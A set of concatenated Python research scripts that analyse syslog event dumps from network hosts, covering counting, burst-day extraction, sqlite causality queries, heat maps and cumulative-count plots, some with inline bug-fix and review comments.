with open(DUMP_FILE, 'rb') as f:
    obj = pickle.load(f)

# Split the {event definition: [timestamps]} dump into one dump per
# event, named '<gid>_<host>.dump'.
for evdef, times in obj.items():
    event_name = str(evdef.gid) + '_' + evdef.host
    print(event_name)
    with open(event_name+'.dump','wb') as f:
        pickle.dump(times,f)
--- FILE SEPARATOR ---
#!/usr/bin/python
import numpy as np
import pandas as pd
import datetime
import search_burst as sb
import plot_day
import pickle
import search_burst as sb
import sqlite3
import glob
'''
log情報を得るやつ
'''
# Number of log entries in the dump at path DUMP_NAME (unlike the other
# scripts' cnt_logs, callers here pass a full 'dumps/<date>/<file>' path;
# DATE is accepted for signature parity but unused).
def cnt_logs(DUMP_NAME,DATE):
    entries = sb.open_dump(DUMP_NAME)
    return len(entries)
def get_eday(evp):
    """Dates ('YYYYMMDD') on which a causal edge exists between the two
    events of *evp*, in either direction.

    evp: pair of '<gid>_<host>' event names. Uses the module-global
    sqlite3 cursor ``cur`` (not created in this script's __main__ —
    calling this here would fail; kept for parity with the sibling
    scripts).
    """
    # maxsplit=1 keeps hosts containing '_' intact (the old unbounded
    # split scrambled the positional argument list in that case).
    src_id, src_host = evp[0].split("_", 1)
    dst_id, dst_host = evp[1].split("_", 1)
    # Parameterized placeholders instead of str.format: no quoting /
    # injection issues with unusual host names.
    query = ('select date from date where pairID in('
             'select pairID from event where '
             '(srcID=? and srcHost=? and dstID=? and dstHost=?) or '
             '(srcID=? and srcHost=? and dstID=? and dstHost=?));')
    params = (int(src_id), src_host, int(dst_id), dst_host,
              int(dst_id), dst_host, int(src_id), src_host)
    cur.execute(query, params)
    # Dates are stored as 'YYYY-MM-DD'; strip the dashes.
    return ["".join(row[0].split("-")) for row in cur.fetchall()]
if __name__ == "__main__":
    # Average number of log entries per day across all dump directories.
    dates = [p.split('/')[-1] for p in glob.glob('dumps/*')]
    daily_totals = np.array([])
    for date in dates:
        total = 0
        for fi in glob.glob('dumps/{0}/*'.format(date)):
            total += cnt_logs(fi, date)
        daily_totals = np.append(daily_totals, total)
    print(np.average(daily_totals))
--- FILE SEPARATOR ---
# args: conf, ltgid
import sys
from logcausality import log_db
from logcausality import lt_label
# BUG FIX: sys.argv[0] is the script path itself; the documented
# arguments "conf, ltgid" arrive as argv[1] and argv[2].
conf = sys.argv[1]
ltgid = sys.argv[2]
ld = log_db.LogData(conf)
ll = lt_label.init_ltlabel(conf)
# Resolve the log-template group's label, then its group name.
label = ll.get_ltg_label(ltgid, ld.ltg_members(ltgid))
group = ll.get_group(label)
print(group)
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
引数で与えられたdumpファイルの全体のヒートマップを描画
python heat_map.py xx.dump yy.dump ...
'''
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import pickle
import sys
import datetime
import collections
def print_full(x):
    """Print DataFrame *x* with pandas row/column truncation disabled.

    Fix: restore the display options in a finally block so an exception
    while printing no longer leaks the widened settings.
    """
    pd.set_option('display.max_rows', len(x))
    pd.set_option('display.max_columns', len(x.columns))
    try:
        print(x)
    finally:
        pd.reset_option('display.max_rows')
        pd.reset_option('display.max_columns')
if __name__ == "__main__":
    # Build one row per dump file: daily log counts over 2012-01-01 ..
    # (456 days), then render them as a heat map.
    values = []
    dn_list = []
    for dn in sys.argv[1:]:
        DUMP_NAME = dn
        dn_list.append(dn.split('/')[-1])
        with open(DUMP_NAME,"rb") as f:
            obj = pickle.load(f, encoding="bytes")
        # Distinct days on which this dump has entries.
        tmp = set( [datetime.datetime(row.year,row.month,row.day) for row in obj ] )
        x = sorted(list(tmp))
        # Y-axis data: per-day counts aligned with x.
        y = sorted(collections.Counter([row.date() for row in obj]).items(),key=lambda x:x[0])
        y = [row[1] for row in y]
        x = [str(z.strftime('%Y-%m-%d')) for z in x]
        # Dense 456-day vector, zero-filled for days without logs.
        z = {str(k)[:10]:0 for k in pd.date_range("20120101",periods=456)}
        for i,j in zip(x,y):
            z[i]=j
        values.append([i[1] for i in sorted(z.items(),key=lambda x:x[0])][:456])
    df = pd.DataFrame(values,columns=pd.date_range("20120101",periods=456),index=dn_list)
    print_full(df)
    # Heat map with x = date, y = dump (event) name.
    # default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
    fig = plt.figure(figsize=(25,18))
    fig.subplots_adjust(right=0.999)
    # ax = fig.add_subplot(111)
    sns.heatmap(df,cmap="Reds")
    print(x)
    # NOTE(review): 16 tick positions but only 15 labels (12 months of
    # 2012 + 3 of 2013) — newer matplotlib raises on this mismatch;
    # confirm the pinned version tolerates it.
    plt.xticks([0,31,59,90,120,151,181,212,243,273,304,334,365,396,426,457],[datetime.date(2012,i,1) for i in range(1,13)]+[datetime.date(2013,i,1) for i in range(1,4)],fontsize='20')
    plt.yticks(fontsize='15',rotation='0')
    plt.grid()
    plt.savefig(dn_list[0].split('_')[0]+'.png')
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import collections
import pandas as pd
import numpy as np
'''
hostの全集計dfのdump生成
python host_pandas.py
'''
# PREFIX = sys.argv[1]
def print_full(x):
    """Print DataFrame *x* with pandas row/column truncation disabled.

    Fix: restore the display options in a finally block so an exception
    while printing no longer leaks the widened settings.
    """
    pd.set_option('display.max_rows', len(x))
    pd.set_option('display.max_columns', len(x.columns))
    try:
        print(x)
    finally:
        pd.reset_option('display.max_rows')
        pd.reset_option('display.max_columns')
# BUG FIX: PREFIX was only defined in a commented-out line above
# ('# PREFIX = sys.argv[1]'), so the globs below raised NameError.
# Restore it from the command line.
PREFIX = sys.argv[1]

# One dump per (event id, host) lives at <PREFIX>/<id-range>/<id>_<host>.dump.
files = glob.glob('{0}/*-*/*'.format(PREFIX))
host_list = []
for fi in files:
    host_list.append(fi.split('/')[-1].split('.')[0].split('_')[1])
for host in set(host_list):
    # All event dumps for this host, across every id-range directory.
    files = glob.glob('{0}/*-*/*_{1}.dump'.format(PREFIX, host))
    df_tmp = pd.DataFrame(index=pd.date_range('20120101', '20130331'), columns=np.arange(1789))
    for fi in files:
        tmp_id = int(fi.split('/')[-1].split('_')[0])
        with open(fi, "rb") as f:
            obj = pickle.load(f, encoding="bytes")
        # Per-day counts for this event id, aligned with the sorted days.
        days = sorted(set(datetime.datetime(row.year, row.month, row.day) for row in obj))
        counted = sorted(collections.Counter([row.date() for row in obj]).items(), key=lambda kv: kv[0])
        counts = [kv[1] for kv in counted]
        for ind, val in zip(days, counts):
            df_tmp.loc[ind, tmp_id] = val
    with open(host + '_df.dump', 'wb') as f:
        pickle.dump(df_tmp, f)
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import collections
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# import search_burst as sb
'''
特定の日の、ID別プロット
no option:
python host_plot_day.py tokyo-dc-rm_df.dump 20120101 prefix
./prefix/0000-0499/イベント別データ
のファイル構造から、自動で、入力日の上位10件の発生イベントを拾ってきてプロットする
option: a
python host_plot_day.py a tokyo-dc-rm_df.dump burst_result prefix"
burst_resultからバーストが検知された日を抽出し、
./prefix/0000-0499/イベント別データ
のファイル構造から、自動で、入力日の上位10件の発生イベントを拾ってきて、全日プロットする
'''
def create_xy(dump_name,get_date):
    """Build step-plot arrays for one event dump restricted to one day.

    dump_name: path of a pickled datetime list; get_date: 'YYYYMMDD'.
    Returns (x, y): x in seconds-of-day, y the cumulative event count,
    both duplicated/staggered so plotting draws horizontal-then-vertical
    stair steps instead of diagonal segments.
    """
    obj = open_dump(dump_name)
    plot_year = int(get_date[:4])
    plot_month = int(get_date[4:6])
    plot_day = int(get_date[6:8])
    plot_date = datetime.date(plot_year,plot_month,plot_day)
    # Only timestamps that fall on the requested day.
    plot_data = [row.time() for row in obj if row.date() == plot_date]
    plot_data_coll = collections.Counter(plot_data)
    x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
    y = [0]
    # Cumulative count in time order.
    for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
        y.append(row[1]+y[-1])
    y = y[1:]
    # Double every x (dropping the last duplicate, re-prepending the
    # first) and pair each y level twice so segments form stair steps.
    x = np.sort(np.append(x,x))[1:]
    x = np.insert(x,0,x[0])
    tmp = []
    for row in y:
        tmp.append(row)
        tmp.append(row)
    y = tmp[:-1]
    y = [0] + y
    # Extend the final level to the end of the day.
    if x[-1] != 86399:
        x = np.append(x,86399)
        y = np.append(y,y[-1])
    return (x,y)
def print_full(x):
    """Print DataFrame *x* with pandas row/column truncation disabled.

    Fix: restore the display options in a finally block so an exception
    while printing no longer leaks the widened settings.
    """
    pd.set_option('display.max_rows', len(x))
    pd.set_option('display.max_columns', len(x.columns))
    try:
        print(x)
    finally:
        pd.reset_option('display.max_rows')
        pd.reset_option('display.max_columns')
def open_dump(dump_file):
    """Load and return the single pickled object stored in *dump_file*."""
    with open(dump_file, "rb") as fh:
        return pickle.load(fh, encoding="bytes")
def get_most_ids(host,get_date):
    """Return (event id, #logs) pairs for *host* on *get_date*
    ('YYYYMMDD'), sorted by log count in descending order.
    """
    ids = []
    for path in glob.glob('dumps/{0}/*_{1}'.format(get_date, host)):
        # File names are '<id>_<host>'; count the pickled entries.
        ids.append((path.split("/")[-1].split("_")[0], len(open_dump(path))))
    # BUG FIX: sorted() returns a new list; the previous code discarded
    # its result and returned the ids unsorted.
    ids.sort(key=lambda x: x[1], reverse=True)
    return ids
def burst2get_dates(burst_file):
    """Collect 'YYYYMMDD' date strings from lines of *burst_file* that look
    like "(YYYY, M, D)"; all other lines are ignored.

    FIX: the original iterated ``open(burst_file)`` directly and never
    closed the file handle; use a ``with`` block instead.
    """
    get_dates = []
    with open(burst_file, "r") as handle:
        for line in handle:
            if line[0] != '(':
                continue
            # strip '(' and ')\n', zero-pad month/day, join to YYYYMMDD
            get_date = "".join([a.strip().zfill(2) for a in line[1:-2].split(",")])
            get_dates.append(get_date)
    return get_dates
if __name__ == "__main__":
    # CLI frontend: plot the daily cumulative curves of the busiest event IDs.
    # See the module docstring for the two invocation forms.
    if len(sys.argv) < 3:
        print("usage:\npython host_plot_day.py tokyo-dc-rm_df.dump 20120101 prefix")
        print("python host_plot_day.py a tokyo-dc-rm_df.dump burst_result.txt prefix")
        exit()
    if sys.argv[1] == 'a':
        # 'a' mode: derive the dates to plot from a burst-result file.
        # NOTE(review): this branch never sets `host`, which the
        # for_paper_plot == 1 path below requires - confirm intended usage.
        dump_name = sys.argv[2]
        burst_file = sys.argv[3]
        prefix = sys.argv[4]
        get_dates = burst2get_dates(burst_file)
    else:
        host = sys.argv[1]
        get_dates = [sys.argv[2]]
        # prefix = sys.argv[3]
    # trailing 'p' selects the paper-figure variant
    if sys.argv[-1] == 'p':
        for_paper_plot = 1
    else:
        for_paper_plot = 0
    colors = ['red','orange','y','lightgreen','green','lightblue','blue','purple','gray','black']
    # df = open_dump(dump_name)
    # host_name = dump_name.split("/")[-1].split('_')[0]
    # print(host_name)
    # print(get_dates)
    if for_paper_plot == 1:
        for get_date in get_dates:
            ids = get_most_ids(host,get_date)
            # set up the figure
            fig = plt.figure(figsize=(10,6))
            #default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
            # fig.subplots_adjust(left=0.03,right=0.999)
            fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15,right=0.87)
            ax = fig.add_subplot(111)
            # plot at most the top five IDs
            for cnt,(idd,num) in enumerate(ids):
                if cnt > 4:
                    break
                # id_host = str(idd) + '_' + host_name + '.dump'
                print(get_date,idd)
                x,y = create_xy('dumps/'+get_date+'/'+idd+'_'+host, get_date)
                print(idd,y[-1])
                plt.plot(x, y,label=cnt+1,color=colors[cnt], lw=1.5)
            # plot the host-wide total curve on top
            x, y = create_xy("dumps_host/"+get_date+'/'+get_date+'_'+host,get_date)
            plt.plot(x, y, "-.", label='all', color="black", lw=1.5)
            # tmp=[[1860,20545],]
            # tmp=[[43200,48326],[79468,81482]]
            # for st,en in tmp:
            # plt.fill([st,en,en,st], [0,0,max(y)*1.5,max(y)*1.5], color='#DBDBDB', alpha=0.8)
            # sts = [4676,7227,63856,68989]; burst_cnt = 0
            # for st in sts:
            # color=['red','orange']
            # if burst_cnt < 2:
            # plt.plot([st,st], [0,max(y)*1.05], "--", color=color[burst_cnt%2], lw=3., label=['Burst\nstart','Burst\nend'][burst_cnt%2])
            # burst_cnt +=1
            # else:
            # plt.plot([st,st], [0,max(y)*1.05], "--", color=color[burst_cnt%2], lw=3.)
            # burst_cnt +=1
            plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2) for i in range(25)],rotation=90,fontsize='20')
            plt.xlim(0,86400)
            plt.yticks(fontsize='25')
            plt.xlabel('time', fontsize='23')
            ax.xaxis.set_label_coords(0.5, -0.13)
            ax.set_ylabel('Cumulative Count', fontsize='23')
            ax.yaxis.set_label_coords(-0.15, 0.5)
            plt.ylim(0,max(y)*1.05)
            # plt.ylabel('Cumulative Count', fontsize='20', x=-50000)
            plt.grid()
            plt.legend(prop={'size':13},bbox_to_anchor=(1.01, 1), loc='upper left', borderaxespad=0)
            # plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
            plt.savefig(host + get_date + '_fp.eps')
    else:
        for get_date in get_dates:
            # NOTE(review): `df` and `host_name` are only assigned in
            # commented-out lines above, so this branch raises NameError as
            # written - confirm before relying on it.
            ids = get_most_ids(df,get_date)
            # set up the figure
            fig = plt.figure(figsize=(30,10))
            #default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
            fig.subplots_adjust(left=0.03,right=0.999)
            # plot at most the top ten IDs
            for cnt,idd in enumerate(ids):
                if cnt > 9:
                    break
                id_host = str(idd) + '_' + host_name + '.dump'
                # dumps are bucketed into folders by ID range
                if idd < 500:
                    id_host_path = prefix + "/0000-0499/" + id_host
                elif idd < 1000:
                    id_host_path = prefix + "/0500-0999/" + id_host
                elif idd < 1500:
                    id_host_path = prefix + "/1000-1499/" + id_host
                else:
                    id_host_path = prefix + "/1500-1999/" + id_host
                x,y = create_xy(id_host_path,get_date)
                print(idd,y[-1])
                plt.plot(x, y,label=idd,color=colors[cnt], lw=3)
            # plot the host-wide total curve on top
            x, y = create_xy("host_dump/"+host_name+".dump",get_date)
            plt.plot(x, y, "--", label='all', color="black", lw=3)
            plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2)+':00\n{0}'.format(i*3600) for i in range(25)],rotation=90)
            plt.xlim(0,86400)
            plt.grid()
            plt.legend()
            # plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
            plt.savefig(host_name + get_date + '.png')
--- FILE SEPARATOR ---
import search_burst as sb
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import datetime
import collections
import pickle
import plot_day
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from scipy import arange, hamming, sin, pi
from scipy.fftpack import fft, ifft, fftfreq
import matplotlib.pyplot as plt
import search_burst as sb
import numpy as np
import pandas as pd
import sys
import datetime
import collections
import glob
# The larger the error, the less the event follows a uniform (periodic) rate
def linear_rms(event, ev_day):
    """Normalised mean absolute deviation between one day's cumulative
    event-count curve and a straight line of constant rate.

    event:  list of datetime objects.
    ev_day: 'YYYYMMDD' string selecting the day.
    Returns 1 when the day has fewer than 10 distinct timestamps; a high
    value means the arrivals are far from uniform in time.
    """
    target = datetime.date(int(ev_day[:4]), int(ev_day[4:6]), int(ev_day[6:8]))
    day_times = [stamp.time() for stamp in event if stamp.date() == target]
    # seconds since midnight for each distinct timestamp, ascending
    seconds = [t.hour * 3600 + t.minute * 60 + t.second
               for t in sorted(set(day_times))]
    if len(seconds) < 10:
        return 1
    # cumulative count at each distinct timestamp
    counts = collections.Counter(day_times)
    cumulative = []
    running = 0
    for _, n in sorted(counts.items(), key=lambda item: item[0]):
        running += n
        cumulative.append(running)
    # ideal straight line: constant arrival rate over the whole day
    rate = len(day_times) / 86400
    ideal = [rate * s for s in seconds]
    deviations = [abs(p - q) for p, q in zip(ideal, cumulative)]
    return sum(deviations) / len(ideal) / len(day_times)
def get_dump_path(ev_name):
    """Map an event name ('<id>_<host>') to its dump path, bucketed by ID range."""
    pf = './'
    temp_id = int(ev_name.split('_')[0])
    for upper, folder in ((500, '0000-0499'), (1000, '0500-0999'), (1500, '1000-1499')):
        if temp_id < upper:
            return pf + folder + '/' + ev_name + '.dump'
    return pf + '1500-1999/' + ev_name + '.dump'
if __name__ == "__main__":
    if len(sys.argv) == 3:
        # single-event mode: score one dump for one day
        dump = sys.argv[1]
        ev_day = sys.argv[2]
        event = sb.open_dump(dump)
        print(linear_rms(event, ev_day))
    else:
        # batch mode: sys.argv[1] is a pickled DataFrame of burst results
        # (events as columns, burst days as index)
        burst_df = sb.open_dump(sys.argv[1])
        # NOTE(review): DataFrame.iteritems() was removed in pandas 2.0;
        # items() is the modern equivalent.
        for i in burst_df.iteritems():
            tmp = i[1].dropna()
            if len(tmp) != 0 :
                print(tmp.name)
                dump_name = get_dump_path(tmp.name)
                event = sb.open_dump(dump_name)
                for ev_day in tmp.index:
                    rms = linear_rms(event, ev_day.strftime('%Y%m%d'))
                    # report only near-linear (low-deviation) days
                    if not rms > 0.1:
                        print(ev_day,'\t',rms)
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
Plot the per-day cumulative counts of one event from its dumps.
python plot.py xxxx
'''
import collections
import sys
import numpy as np
import matplotlib.pyplot as plt
import pybursts
import datetime
import matplotlib.dates as mdates
import pickle
import plot_day
import glob
import search_burst as sb
def burst2get_data(burst_file):
    """Parse a burst-result text file.

    Returns a defaultdict mapping 'YYYYMMDD' -> list of (start, end) burst
    intervals in seconds.  Date header lines look like "(YYYY, M, D)";
    burst lines start with '[' and carry start/end in fields 1 and 2.

    FIXES: blank lines used to raise IndexError on ``line.strip()[0]``,
    and the file handle was never closed.
    """
    get_data = collections.defaultdict(lambda: 0)
    with open(burst_file, "r") as handle:
        for line in handle:
            stripped = line.strip()
            if not stripped:
                # skip blank lines (previously crashed here)
                continue
            if line[0] == '(':
                get_date = "".join([a.strip().zfill(2) for a in line[1:-2].split(",")])
                get_data[get_date] = []
            elif stripped[0] == "[":
                st = stripped[1:-2].split(",")[1].strip()
                en = stripped[1:-2].split(",")[2].strip()
                get_data[get_date].append((float(st), float(en)))
    return get_data
# Script body: bar-plot the daily total record count of one event across
# every day for which a dump exists.
event = sys.argv[1]
# every per-day dump of this event
files = glob.glob('dumps/*/{}'.format(event))
x = []
y = []
for fi in files:
    data = sb.open_dump(fi)
    print(data[0].date(),":",len(data))
    # one bar per day: date on x, record count on y
    x.append(data[0].date())
    y.append(len(data))
# DUMP_NAME = sys.argv[1]
# if len(sys.argv) > 2:
# PLOT_BURST = int(sys.argv[2])
# else:
# PLOT_BURST = 0
#
# with open(DUMP_NAME,"rb") as f:
# obj = pickle.load(f, encoding="bytes")
#
# tmp = set( [datetime.datetime(row.year,row.month,row.day) for row in obj ] )
# x = sorted(list(tmp))
#
# # Y axis data
# y = sorted(collections.Counter([row.date() for row in obj]).items(),key=lambda x:x[0])
# y = [row[1] for row in y]
#
# set up the figure
fig = plt.figure(figsize=(30,10))
# ax = fig.add_subplot(111)
fig.subplots_adjust(left=0.03,right=0.995)
plt.bar(x, y, color='b',edgecolor='b')
# month boundaries 2012-01 .. 2013-04 as tick labels
xticks_label = [datetime.date(2012,i,1)for i in range(1,13)] + [datetime.date(2013,i,1) for i in range(1,5)]
plt.xticks(xticks_label,xticks_label)
plt.xlim(xticks_label[0],xticks_label[-1])
# NOTE(review): grid(b=...) was renamed to visible= in Matplotlib 3.6.
plt.grid(b=True, which='major',color='black',lw='1')
# print(DUMP_NAME.split('/')[-1].split('.')[0]+'.png')
plt.savefig(event+'.png')
#
# if PLOT_BURST == 1:
# burst_days=burst2get_data('burst_rplinear_0000-0499/'+DUMP_NAME.split('/')[-1]+'.txt').keys()
# print(burst_days)
#
# for burst_day in burst_days:
# plot_day.plot_day(DUMP_NAME,burst_day)
#
#
# exit()
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
Plot the specified day,
with cumulative sum and moving average.
python plot_day.py xxxx.dump 20120101
'''
import collections
import sys
import numpy as np
import matplotlib.pyplot as plt
import pybursts
import datetime
import matplotlib.dates as mdates
import pickle
# import search_burst as sb
import os.path
def open_dump(dump_file):
    """Load and return the pickled object stored at *dump_file*."""
    handle = open(dump_file, "rb")
    try:
        return pickle.load(handle, encoding="bytes")
    finally:
        handle.close()
def get_dump_path(DUMP_NAME, DATE):
    """Return 'dumps/<DATE>/<DUMP_NAME>' if it exists; otherwise report and exit."""
    candidate = 'dumps/' + DATE + '/' + DUMP_NAME
    if not os.path.exists(candidate):
        print('file not exist')
        exit()
    return candidate
def plot_day(DUMP_NAME, DATE):
    # Interactive (plt.show) staircase plot of the cumulative event count.
    # DUMP_NAME: used as a path if it contains '/', otherwise resolved via
    # get_dump_path().  DATE: 'YYYYMMDD'.
    if "/" in DUMP_NAME:
        obj = open_dump(DUMP_NAME)
    else:
        obj = open_dump(get_dump_path(DUMP_NAME,DATE))
    plot_year = int(DATE[:4])
    plot_month = int(DATE[4:6])
    plot_day = int(DATE[6:8])
    plot_date = datetime.date(plot_year,plot_month,plot_day)
    plot_data = [row for row in obj if row.date() == plot_date]
    # print(plot_data)
    # plot_data = [row.time() for row in obj if row.date() == plot_date]
    # NOTE(review): the next line uses EVERY record in the dump, discarding
    # the date filter computed just above (the commented-out line is the
    # filtered version) - presumably a debugging leftover; confirm intent.
    plot_data = [row.time() for row in obj]
    plot_data_coll = collections.Counter(plot_data)
    # seconds since midnight per distinct timestamp / cumulative counts
    x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
    y = [0]
    for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
        y.append(row[1]+y[-1])
    y = y[1:]
    # staircase transform: duplicate points so steps render flat
    x = np.sort(np.append(x,x))[1:]
    x = np.insert(x,0,x[0])
    tmp = []
    for row in y:
        tmp.append(row)
        tmp.append(row)
    y = tmp[:-1]
    y = [0] + y
    # plot
    fig = plt.figure(figsize=(30,10))
    #default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
    fig.subplots_adjust(left=0.03,right=0.999)
    plt.title(DUMP_NAME+"\t"+DATE)
    plt.plot(x, y)
    plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2)+':00\n{0}'.format(i*3600) for i in range(25)],fontsize=25,rotation=90)
    plt.yticks(fontsize=25)
    plt.xlim(0,86400)
    # plt.grid()
    # plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
    plt.show()
def plot_day_old(DUMP_NAME, DATE):
    # Older variant: takes DUMP_NAME as a direct path and saves a PNG
    # instead of showing the figure interactively.
    obj = open_dump(DUMP_NAME)
    plot_year = int(DATE[:4])
    plot_month = int(DATE[4:6])
    plot_day = int(DATE[6:8])
    plot_date = datetime.date(plot_year,plot_month,plot_day)
    plot_data = [row for row in obj if row.date() == plot_date]
    print(plot_data)
    # plot_data = [row.time() for row in obj if row.date() == plot_date]
    # NOTE(review): as in plot_day(), this line ignores the date filter and
    # uses the whole dump - confirm intent.
    plot_data = [row.time() for row in obj]
    plot_data_coll = collections.Counter(plot_data)
    x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
    y = [0]
    for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
        y.append(row[1]+y[-1])
    y = y[1:]
    # staircase transform
    x = np.sort(np.append(x,x))[1:]
    x = np.insert(x,0,x[0])
    tmp = []
    for row in y:
        tmp.append(row)
        tmp.append(row)
    y = tmp[:-1]
    y = [0] + y
    # set up the figure
    fig = plt.figure(figsize=(12,8))
    #default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
    fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15)
    ax = fig.add_subplot(111)
    plt.plot(x, y, lw=3)
    plt.xticks([i*3600 for i in range(25)][::2],[str(i).zfill(2) for i in range(25)][::2],rotation=90,fontsize='20')
    plt.yticks(fontsize='25')
    # print(x)
    # for st in set(x):
    # plt.plot([st,st], [0,max(y)*1.05], "--", color='red', alpha=0.3)
    # plt.bar(st, max(y)*1.05)
    # plt.plot([en,en], [0,max(y)*1.05], "--", color='orange', alpha=0.3)
    # plt.fill([st,en,en,st], [0,0,max(y)*1.05,max(y)*1.05], color='#D0D0D0', alpha=0.1)
    # plt.fill([st,en,en,st], [0,0,max(y)*1.05,max(y)*1.05], color='#505050', alpha=0.1)
    plt.xlabel('time', fontsize='23')
    ax.xaxis.set_label_coords(0.5, -0.13)
    ax.set_ylabel('Cumulative Count', fontsize='23')
    plt.xlim(0,86400)
    plt.ylim(0,max(y)*1.05)
    plt.grid()
    plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
def plot_day_fp(DUMP_NAME, DATE):
    # Paper-figure variant: date-filtered data, padded to the full day,
    # saved as '<name>_<DATE>.png'.
    obj = open_dump(get_dump_path(DUMP_NAME,DATE))
    plot_year = int(DATE[:4])
    plot_month = int(DATE[4:6])
    plot_day = int(DATE[6:8])
    plot_date = datetime.date(plot_year,plot_month,plot_day)
    plot_data = [row for row in obj if row.date() == plot_date]
    plot_data = [row.time() for row in obj if row.date() == plot_date]
    plot_data_coll = collections.Counter(plot_data)
    x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
    y = [0]
    for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
        y.append(row[1]+y[-1])
    y = y[1:]
    # staircase transform, then extend the final step to 23:59:59
    x = np.sort(np.append(x, x))[1:]
    x = np.insert(x, 0, x[0])
    x = np.append(x, 86399)
    tmp = []
    for row in y:
        tmp.append(row)
        tmp.append(row)
    y = tmp[:-1]
    y = [0] + y + [y[-1]]
    # set up the figure
    fig = plt.figure(figsize=(12,8))
    #default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
    fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15)
    # for st,en in tmp:
    # plt.plot([st,st], [0,max(y)*1.05], "--", color='red', alpha=0.3)
    # plt.bar(st, max(y)*1.05)
    # plt.plot([en,en], [0,max(y)*1.05], "--", color='orange', alpha=0.3)
    # plt.fill([st,en,en,st], [0,0,max(y)*1.05,max(y)*1.05], color='#D0D0D0', alpha=0.1)
    # plt.fill([st,en,en,st], [0,0,max(y)*1.05,max(y)*1.05], color='#505050', alpha=0.1)
    ax = fig.add_subplot(111)
    plt.title(DUMP_NAME+"\t"+DATE)
    plt.plot(x, y, lw=3)
    plt.xticks([i*3600 for i in range(25)][::2],[str(i).zfill(2) for i in range(25)][::2],rotation=90,fontsize='20')
    # plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2) for i in range(25)],rotation=90,fontsize='20')
    plt.yticks(fontsize='25')
    # plt.title('Ex.5', fontsize='20')
    plt.xlabel('time', fontsize='23')
    ax.xaxis.set_label_coords(0.5, -0.13)
    ax.set_ylabel('Cumulative Count', fontsize='23')
    # ax.yaxis.set_label_coords(-0.15, 0.5)
    # plt.ylabel('Cumulative Count', fontsize='20', x=-50000)
    plt.xlim(0,86400)
    plt.ylim(0,max(y)*1.05)
    plt.grid()
    plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
    # plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.eps')
def plot_day_comp(DUMP_NAME1, DUMP_NAME2, DATE):
    # Two stacked subplots comparing the cumulative curves of two events on
    # the same DATE; saved as '<name1>-<name2>_<DATE>.png'.
    # plot
    fig = plt.figure(figsize=(18,10))
    #default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
    fig.subplots_adjust(left=0.03,right=0.999, hspace=0.5)
    plot_cnt = 1
    for DUMP_NAME in [DUMP_NAME1,DUMP_NAME2]:
        obj = open_dump(get_dump_path(DUMP_NAME,DATE))
        plot_year = int(DATE[:4])
        plot_month = int(DATE[4:6])
        plot_day = int(DATE[6:8])
        plot_date = datetime.date(plot_year,plot_month,plot_day)
        plot_data = [row.time() for row in obj if row.date() == plot_date]
        plot_data_coll = collections.Counter(plot_data)
        x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
        y = [0]
        for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
            y.append(row[1]+y[-1])
        y = y[1:]
        # staircase transform
        x = np.sort(np.append(x,x))[1:]
        x = np.insert(x,0,x[0])
        tmp = []
        for row in y:
            tmp.append(row)
            tmp.append(row)
        y = tmp[:-1]
        y = [0] + y
        plt.subplot(2,1,plot_cnt)
        plt.plot(x, y)
        plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2)+':00\n{0}'.format(i*3600) for i in range(25)],rotation=90)
        plt.title(DUMP_NAME.split('/')[-1], fontsize=('20'))
        plt.xlim(0,86400)
        plt.grid()
        plot_cnt += 1
    plt.savefig(DUMP_NAME1.split('/')[-1].split('.')[0]+'-'+DUMP_NAME2.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
def plot_day_comp_fp(DUMP_NAME1, DUMP_NAME2, DATE, DIRECTION):
    """Paper-figure comparison: two stacked cumulative-count subplots for the
    two events on *DATE*, saved as '<name1>-<name2>_<DATE>.png'.

    DIRECTION selects the subplot titles: '1' -> Source/Destination,
    '0' -> 'No Direction Detected', anything else -> no titles.

    FIX: corrected typos in the user-facing titles
    ('Sorce' -> 'Source', 'Ditected' -> 'Detected').
    """
